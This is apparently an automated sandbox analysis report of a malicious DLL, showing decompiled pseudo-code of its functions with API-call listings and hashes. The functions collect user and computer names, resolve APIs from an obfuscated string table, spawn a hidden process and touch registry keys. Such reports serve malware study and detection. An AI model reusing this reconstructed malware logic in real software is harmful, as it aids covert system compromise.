                                                  				}
                                                  				E04F4A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                  				_t40 = _v12(_v12);
                                                  				_v8 = _t40;
                                                  				if(_t40 == 0 && ( *0x4f4d260 & 0x00000001) != 0) {
                                                  					_v32 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v108 = 0;
                                                  					memset( &_v104, 0, 0x40);
                                                  					_t47 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t18 = _t47 + 0x4f4e3e6; // 0x73797325
                                                  					_t68 = E04F495B1(_t18);
                                                  					if(_t68 == 0) {
                                                  						_v8 = 8;
                                                  					} else {
                                                  						_t50 =  *0x4f4d27c; // 0x212a5a8
                                                  						_t19 = _t50 + 0x4f4e747; // 0x7078cef
                                                  						_t20 = _t50 + 0x4f4e0af; // 0x4e52454b
                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                  						if(_t71 == 0) {
                                                  							_v8 = 0x7f;
                                                  						} else {
                                                  							_v108 = 0x44;
                                                  							E04F484D5();
                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                  							_push(1);
                                                  							E04F484D5();
                                                  							if(_t58 == 0) {
                                                  								_v8 = GetLastError();
                                                  							} else {
                                                  								CloseHandle(_v28);
                                                  								CloseHandle(_v32);
                                                  							}
                                                  						}
                                                  						HeapFree( *0x4f4d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				_t70 = _v16;
                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                  				E04F49039(_t70);
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04F4692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F4207A,?,00000001,?,?,00000000,00000000), ref: 04F46951
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F46973
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F46989
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F4699F
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F469B5
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F469CB
                                                  • memset.NTDLL ref: 04F420C8
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04F423E9,63699BCE,04F41354,73797325), ref: 04F495C2
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F495DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,07078CEF,73797325), ref: 04F420FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 04F42105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4216D
                                                    • Part of subcall function 04F484D5: GetProcAddress.KERNEL32(36776F57,04F421E5), ref: 04F484F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 04F4214A
                                                  • CloseHandle.KERNEL32(?), ref: 04F4214F
                                                  • GetLastError.KERNEL32(00000001), ref: 04F42153
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 73baea2187a44bca484a9753c77dadd1a2b35bc2b2f7b271d98102a492b26cb0
                                                  • Instruction ID: 2ed1332c50120d6b9ea9f550c00accc7d31f7564f731a3b33cfb83adee7cb2e1
                                                  • Opcode Fuzzy Hash: 73baea2187a44bca484a9753c77dadd1a2b35bc2b2f7b271d98102a492b26cb0
                                                  • Instruction Fuzzy Hash: 9E310DB6D0020CAFEB10AFE8DC84D9EBFB8EB88394F014465F615A7111DA75AE469B50
Uniqueness
• Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E04F48307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t13;
                                                  				char* _t28;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				char* _t36;
                                                  				intOrPtr* _t40;
                                                  				char* _t41;
                                                  				char* _t42;
                                                  				char* _t43;
                                                  
                                                  				_t34 = __edx;
                                                  				_push(__ecx);
                                                  				_t9 =  *0x4f4d27c; // 0x212a5a8
                                                  				_t1 = _t9 + 0x4f4e62c; // 0x253d7325
                                                  				_t36 = 0;
                                                  				_t28 = E04F49401(__ecx, _t1);
                                                  				if(_t28 != 0) {
                                                  					_t40 = __imp__;
                                                  					_t13 =  *_t40(_t28);
                                                  					_v8 = _t13;
                                                  					_t41 = E04F42049(_v8 +  *_t40(_a4) + 1);
                                                  					if(_t41 != 0) {
                                                  						strcpy(_t41, _t28);
                                                  						_pop(_t33);
                                                  						__imp__(_t41, _a4);
                                                  						_t36 = E04F47225(_t34, _t41, _a8);
                                                  						E04F49039(_t41);
                                                  						_t42 = E04F48E82(StrTrimA(_t36, "="), _t36);
                                                  						if(_t42 != 0) {
                                                  							E04F49039(_t36);
                                                  							_t36 = _t42;
                                                  						}
                                                  						_t43 = E04F4788B(_t36, _t33);
                                                  						if(_t43 != 0) {
                                                  							E04F49039(_t36);
                                                  							_t36 = _t43;
                                                  						}
                                                  					}
                                                  					E04F49039(_t28);
                                                  				}
                                                  				return _t36;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04F49401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04F48321,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?), ref: 04F49468
                                                    • Part of subcall function 04F49401: sprintf.NTDLL ref: 04F49489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?,070795B0), ref: 04F48332
                                                  • lstrlen.KERNEL32(?,?,?,04F4A428,?,070795B0), ref: 04F4833A
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • strcpy.NTDLL ref: 04F48351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04F4835C
                                                    • Part of subcall function 04F47225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04F4836B,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F4723C
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F48379
                                                    • Part of subcall function 04F48E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F48385,00000000,?,?,04F4A428,?,070795B0), ref: 04F48E8C
                                                    • Part of subcall function 04F48E82: _snprintf.NTDLL ref: 04F48EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: ebfa84bd5f873fafedf5a7bdea95a0ab02f565481bd95a4e868c1a89f7a17a27
                                                  • Instruction ID: dc1d0d637e44ff8c75d143597e585c459bfaf2a0ffb8db708364a1fefdc0578f
                                                  • Opcode Fuzzy Hash: ebfa84bd5f873fafedf5a7bdea95a0ab02f565481bd95a4e868c1a89f7a17a27
                                                  • Instruction Fuzzy Hash: 7F11C677A01225B767227BB9AC84C7F3E9DDFC56A8705401AF50497100DE79ED0357E0
Uniqueness
• Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04F46D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 04F46D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04F46D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F46DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F46DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04F46DC3
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
• Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
• Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
• Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: bf505eb7646bcd4616ff9d8d2d1a21b210069209237f14327fc29d0de4e3bc27
                                                  • Instruction ID: da124c51669f26e8d6e89964884bbcf9547706b6244ad4afba52463901d8895a
                                                  • Opcode Fuzzy Hash: bf505eb7646bcd4616ff9d8d2d1a21b210069209237f14327fc29d0de4e3bc27
                                                  • Instruction Fuzzy Hash: 53313D36D00609ABEB01DFBCD844A9FBBB6EF89314F154465E910EB220DB75A906CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04F4692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t26;
                                                  				_Unknown_base(*)()* _t28;
                                                  				intOrPtr _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				intOrPtr _t33;
                                                  				_Unknown_base(*)()* _t35;
                                                  				intOrPtr _t36;
                                                  				_Unknown_base(*)()* _t38;
                                                  				intOrPtr _t39;
                                                  				_Unknown_base(*)()* _t41;
                                                  				intOrPtr _t44;
                                                  				struct HINSTANCE__* _t48;
                                                  				intOrPtr _t54;
                                                  
                                                  				_t54 = E04F42049(0x20);
                                                  				if(_t54 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t23 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t1 = _t23 + 0x4f4e11a; // 0x4c44544e
                                                  					_t48 = GetModuleHandleA(_t1);
                                                  					_t26 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t2 = _t26 + 0x4f4e769; // 0x7243775a
                                                  					_v8 = 0x7f;
                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                  					 *(_t54 + 0xc) = _t28;
                                                  					if(_t28 == 0) {
                                                  						L8:
                                                  						E04F49039(_t54);
                                                  					} else {
                                                  						_t30 =  *0x4f4d27c; // 0x212a5a8
                                                  						_t5 = _t30 + 0x4f4e756; // 0x614d775a
                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                  						 *(_t54 + 0x10) = _t32;
                                                  						if(_t32 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t33 =  *0x4f4d27c; // 0x212a5a8
                                                  							_t7 = _t33 + 0x4f4e40b; // 0x6e55775a
                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                  							 *(_t54 + 0x14) = _t35;
                                                  							if(_t35 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t36 =  *0x4f4d27c; // 0x212a5a8
                                                  								_t9 = _t36 + 0x4f4e4d2; // 0x4e6c7452
                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                  								 *(_t54 + 0x18) = _t38;
                                                  								if(_t38 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t39 =  *0x4f4d27c; // 0x212a5a8
                                                  									_t11 = _t39 + 0x4f4e779; // 0x6c43775a
                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                  									 *(_t54 + 0x1c) = _t41;
                                                  									if(_t41 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                  										_t44 = E04F4727B(_t54, _a8);
                                                  										_v8 = _t44;
                                                  										if(_t44 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a12 = _t54;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F4207A,?,00000001,?,?,00000000,00000000), ref: 04F46951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F46973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F46989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F4699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F469B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F469CB
                                                    • Part of subcall function 04F4727B: memset.NTDLL ref: 04F472FA
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: ff1935a2acb60a17eda79d1761a73e0dca7ca33e500fd3f219cff7ceb3fc6c8b
                                                  • Instruction ID: 37ba8ecaaeefe3dc54f86f7eae0ca115bd73d1576d72baf6a19ead10d71d852b
                                                  • Opcode Fuzzy Hash: ff1935a2acb60a17eda79d1761a73e0dca7ca33e500fd3f219cff7ceb3fc6c8b
                                                  • Instruction Fuzzy Hash: 982132B560120ADFEB20DFBDD844D567BECEB993447018529E655C7601EF78FA018B70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04F47649() {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				long _t39;
                                                  				long _t43;
                                                  				signed int _t47;
                                                  				signed int _t52;
                                                  				int _t56;
                                                  				int _t57;
                                                  				char* _t63;
                                                  				short* _t66;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				GetUserNameW(0,  &_v8);
                                                  				_t39 = _v8;
                                                  				if(_t39 != 0) {
                                                  					_v12 = _t39;
                                                  					_v8 = 0;
                                                  					GetComputerNameW(0,  &_v8);
                                                  					_t43 = _v8;
                                                  					if(_t43 != 0) {
                                                  						_v12 = _v12 + _t43 + 2;
                                                  						_t63 = E04F42049(_v12 + _t43 + 2 << 2);
                                                  						if(_t63 != 0) {
                                                  							_t47 = _v12;
                                                  							_t66 = _t63 + _t47 * 2;
                                                  							_v8 = _t47;
                                                  							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                  								L7:
                                                  								E04F49039(_t63);
                                                  							} else {
                                                  								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                  								_t52 = _v8;
                                                  								_v12 = _v12 - _t52;
                                                  								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                  									goto L7;
                                                  								} else {
                                                  									_t56 = _v12 + _v8;
                                                  									_t31 = _t56 + 2; // 0x4f4a33a
                                                  									_v12 = _t56;
                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                  									_v8 = _t57;
                                                  									if(_t57 == 0) {
                                                  										goto L7;
                                                  									} else {
                                                  										_t63[_t57] = 0;
                                                  										_v16 = _t63;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v16;
                                                  			}

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,04F4A338), ref: 04F4765D
                                                  • GetComputerNameW.KERNEL32(00000000,04F4A338), ref: 04F47679
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                  • GetUserNameW.ADVAPI32(00000000,04F4A338), ref: 04F476B3
                                                  • GetComputerNameW.KERNEL32(04F4A338,?), ref: 04F476D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04F4A338,00000000,04F4A33A,00000000,00000000,?,?,04F4A338), ref: 04F476F8
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 2319aab089c96302c2237cae18f16e780d3e0f88a29b5353c8ca140f04d3a667
                                                  • Instruction ID: dd9ff72dd6d1d0a91ca6691e59971c5925d68b9246a5e64bc5a919020c7ae315
                                                  • Opcode Fuzzy Hash: 2319aab089c96302c2237cae18f16e780d3e0f88a29b5353c8ca140f04d3a667
                                                  • Instruction Fuzzy Hash: 7F219776D00249FBDB11DFA9D984CEEBBF8EE84344B5444AAE501E7240EB34AF45DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E04F41585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __esi;
                                                  				long _t10;
                                                  				void* _t18;
                                                  				void* _t22;
                                                  
                                                  				_t9 = __eax;
                                                  				_t22 = __eax;
                                                  				if(_a4 != 0 && E04F47F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                  					L9:
                                                  					return GetLastError();
                                                  				}
                                                  				_t10 = E04F4A9AB(_t9, _t18, _t22, _a8);
                                                  				if(_t10 == 0) {
                                                  					ResetEvent( *(_t22 + 0x1c));
                                                  					ResetEvent( *(_t22 + 0x20));
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xffffffff);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                  					if( *0x4f4d130() != 0) {
                                                  						SetEvent( *(_t22 + 0x1c));
                                                  						goto L7;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  						if(_t10 == 0x3e5) {
                                                  							L7:
                                                  							_t10 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_t10 == 0xffffffff) {
                                                  					goto L9;
                                                  				}
                                                  				return _t10;
                                                  			}

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04F411DA,?,?,00000000,00000000), ref: 04F415BF
                                                  • ResetEvent.KERNEL32(?), ref: 04F415C4
                                                  • GetLastError.KERNEL32 ref: 04F415DC
                                                  • GetLastError.KERNEL32(?,?,00000102,04F411DA,?,?,00000000,00000000), ref: 04F415F7
                                                    • Part of subcall function 04F47F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?,?,00000000), ref: 04F47F33
                                                    • Part of subcall function 04F47F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F415A4,?,?,?,?,00000102,04F411DA,?), ref: 04F47F91
                                                    • Part of subcall function 04F47F27: lstrcpy.KERNEL32(00000000,00000000), ref: 04F47FA1
                                                  • SetEvent.KERNEL32(?), ref: 04F415EA
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: ab4c9079a6b67779f469ef31e32471aad369baeb977c453223940404737687e2
                                                  • Instruction ID: b72e9322e6c51a25e38314b3940a58beb82d949843973178ebc7c9a6a3333986
                                                  • Opcode Fuzzy Hash: ab4c9079a6b67779f469ef31e32471aad369baeb977c453223940404737687e2
                                                  • Instruction Fuzzy Hash: C701AD31501601ABE7306F61EE48B9BBFA8EFD4364F114A25F552D10E0EF20F886DA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04F48F10(intOrPtr _a4) {
                                                  				void* _t2;
                                                  				long _t4;
                                                  				void* _t5;
                                                  				long _t6;
                                                  				void* _t7;
                                                  				void* _t13;
                                                  
                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                  				 *0x4f4d26c = _t2;
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t4 = GetVersion();
                                                  				if(_t4 != 5) {
                                                  					L4:
                                                  					if(_t13 <= 0) {
                                                  						_t5 = 0x32;
                                                  						return _t5;
                                                  					}
                                                  					L5:
                                                  					 *0x4f4d25c = _t4;
                                                  					_t6 = GetCurrentProcessId();
                                                  					 *0x4f4d258 = _t6;
                                                  					 *0x4f4d264 = _a4;
                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                  					 *0x4f4d254 = _t7;
                                                  					if(_t7 == 0) {
                                                  						 *0x4f4d254 =  *0x4f4d254 | 0xffffffff;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				if(_t4 > 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t13 = _t4 - _t4;
                                                  				goto L4;
                                                  			}

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F46A90,?,?,00000001,?,?,?,04F4807D,?), ref: 04F48F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F48F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F48F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04F4807D,?), ref: 04F48F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,04F4807D,?), ref: 04F48F7A
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 92162cbf15bc9c18ae17a606c162ed0c3ab35dfa4e859cddfe9d2864ae24e7e2
                                                  • Instruction ID: 0696cc3635ad035d1e45ce041f23a71bce553f53290c2cd9a96f4fe888f7ba43
                                                  • Opcode Fuzzy Hash: 92162cbf15bc9c18ae17a606c162ed0c3ab35dfa4e859cddfe9d2864ae24e7e2
                                                  • Instruction Fuzzy Hash: BCF04F7CA853499AF720AF68BD19B143FA2E7E47E0F014519E542CA6D0DF78A942CB34
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E04F417D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				char _v284;
                                                  				void* __esi;
                                                  				char* _t60;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr _t65;
                                                  				char _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				void* _t78;
                                                  				void* _t88;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  				char _t104;
                                                  				signed int* _t106;
                                                  				intOrPtr* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t98 = __ecx;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t104 = _a16;
                                                  				if(_t104 == 0) {
                                                  					__imp__( &_v284,  *0x4f4d33c);
                                                  					_t97 = 0x80000002;
                                                  					L6:
                                                  					_t60 = E04F4809F(0,  &_v284);
                                                  					_a8 = _t60;
                                                  					if(_t60 == 0) {
                                                  						_v8 = 8;
                                                  						L29:
                                                  						_t61 = _a20;
                                                  						if(_t61 != 0) {
                                                  							 *_t61 =  *_t61 + 1;
                                                  						}
                                                  						return _v8;
                                                  					}
                                                  					_t107 = _a24;
                                                  					if(E04F488B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                  						L27:
                                                  						E04F49039(_a8);
                                                  						goto L29;
                                                  					}
                                                  					_t65 =  *0x4f4d27c; // 0x212a5a8
                                                  					_t16 = _t65 + 0x4f4e8fe; // 0x65696c43
                                                  					_t68 = E04F4809F(0, _t16);
                                                  					_a24 = _t68;
                                                  					if(_t68 == 0) {
                                                  						L14:
                                                  						_t29 = _t107 + 0x14; // 0x102
                                                  						_t33 = _t107 + 0x10; // 0x3d04f4c0
                                                  						if(E04F4A635(_t103,  *_t33, _t97, _a8,  *0x4f4d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                  							_t72 =  *0x4f4d27c; // 0x212a5a8
                                                  							if(_t104 == 0) {
                                                  								_t35 = _t72 + 0x4f4ea5f; // 0x4d4c4b48
                                                  								_t73 = _t35;
                                                  							} else {
                                                  								_t34 = _t72 + 0x4f4e89f; // 0x55434b48
                                                  								_t73 = _t34;
                                                  							}
                                                  							if(E04F4816C(_t73,  *0x4f4d334,  *0x4f4d338,  &_a24,  &_a16) == 0) {
                                                  								if(_t104 == 0) {
                                                  									_t75 =  *0x4f4d27c; // 0x212a5a8
                                                  									_t44 = _t75 + 0x4f4e871; // 0x74666f53
                                                  									_t78 = E04F4809F(0, _t44);
                                                  									_t105 = _t78;
                                                  									if(_t78 == 0) {
                                                  										_v8 = 8;
                                                  									} else {
                                                  										_t47 = _t107 + 0x10; // 0x3d04f4c0
                                                  										E04F42659( *_t47, _t97, _a8,  *0x4f4d338, _a24);
                                                  										_t49 = _t107 + 0x10; // 0x3d04f4c0
                                                  										E04F42659( *_t49, _t97, _t105,  *0x4f4d330, _a16);
                                                  										E04F49039(_t105);
                                                  									}
                                                  								} else {
                                                  									_t40 = _t107 + 0x10; // 0x3d04f4c0
                                                  									E04F42659( *_t40, _t97, _a8,  *0x4f4d338, _a24);
                                                  									_t43 = _t107 + 0x10; // 0x3d04f4c0
                                                  									E04F42659( *_t43, _t97, _a8,  *0x4f4d330, _a16);
                                                  								}
                                                  								if( *_t107 != 0) {
                                                  									E04F49039(_a24);
                                                  								} else {
                                                  									 *_t107 = _a16;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					_t21 = _t107 + 0x10; // 0x3d04f4c0
                                                  					if(E04F46BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                  						_t106 = _v16;
                                                  						_t88 = 0x28;
                                                  						if(_v12 == _t88) {
                                                  							 *_t106 =  *_t106 & 0x00000000;
